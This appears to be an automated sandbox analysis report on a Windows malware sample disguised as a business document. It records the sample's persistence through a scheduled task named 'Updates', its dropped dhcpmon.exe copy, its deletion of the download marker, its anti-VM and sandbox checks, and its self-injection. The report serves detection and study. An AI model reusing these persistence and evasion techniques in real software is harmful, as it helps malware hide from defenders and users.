Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B65EA push edx; retf
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F65EA push edx; retf
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_013B9EA8 push eax; ret

Source: initial sample	Static PE information: section name: .text entropy: 7.48398522287
Source: initial sample	Static PE information: section name: .text entropy: 7.48398522287
Source: initial sample	Static PE information: section name: .text entropy: 7.48398522287

Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	File created: C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe			Jump to dropped file
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

File opened: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe:Zone.Identifier read attributes | delete

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.672967750.0000000002EA8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.723420263.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.2e56bb8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.2ed6b58.1.raw.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Window / User API: threadDelayed 5565
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Window / User API: threadDelayed 3776
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Window / User API: foregroundWindowGot 596
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Window / User API: foregroundWindowGot 742

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe TID: 7056	Thread sleep time: -101197s >= -30000s
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe TID: 7080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe TID: 1368	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6768	Thread sleep time: -99091s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6876	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4292	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: dhcpmon.exe, 00000008.00000003.715656595.000000000137A000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9
Source: dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Memory written: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Memory written: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp'
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Process created: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmpAD4D.tmp'
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
